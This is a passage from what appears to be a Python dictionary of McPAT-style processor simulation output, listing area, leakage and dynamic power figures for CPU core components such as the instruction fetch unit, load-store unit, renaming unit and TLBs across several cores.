'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0580464,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0585369,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.338936,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0459651,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.594759,
'Memory Management Unit/Runtime Dynamic': 0.104502,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 20.7347,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.187153,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0152434,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.143713,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.34611,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 4.8859,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0543055,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.245343,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.394195,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.260055,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.41946,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.211729,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.891244,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.236992,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.92342,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0744719,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0109079,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.095105,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0806705,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.169577,
'Execution Unit/Register Files/Runtime Dynamic': 0.0915784,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.213939,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.555101,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.18864,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00174099,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00174099,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00154949,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000617927,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00115884,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0061903,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0155103,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0775507,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 4.93289,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.227723,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.263397,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 7.3908,
'Instruction Fetch Unit/Runtime Dynamic': 0.590371,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0228357,
'L2/Runtime Dynamic': 0.00464711,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.6387,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.15404,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0776969,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0776969,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 4.0056,
'Load Store Unit/Runtime Dynamic': 1.61491,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.191587,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.383174,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.067995,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0683372,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.306709,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0373336,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.579621,
'Memory Management Unit/Runtime Dynamic': 0.105671,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 20.5118,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.195901,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0141171,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.129012,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.33903,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 4.84328,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0623769,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.251682,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.337606,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.224582,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.362242,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.182848,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.769672,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.205098,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.81868,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0637809,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00941997,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0914408,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0696664,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.155222,
'Execution Unit/Register Files/Runtime Dynamic': 0.0790864,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.208238,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.526198,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.03202,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00132104,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00132104,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00115785,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000452173,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00100076,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00480069,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0124079,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0669721,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 4.26,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.200165,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.227468,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 6.68526,
'Instruction Fetch Unit/Runtime Dynamic': 0.511813,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0382461,
'L2/Runtime Dynamic': 0.0083586,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.12016,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.38594,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0932732,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0932732,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 4.56062,
'Load Store Unit/Runtime Dynamic': 1.9392,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.229996,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.459992,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
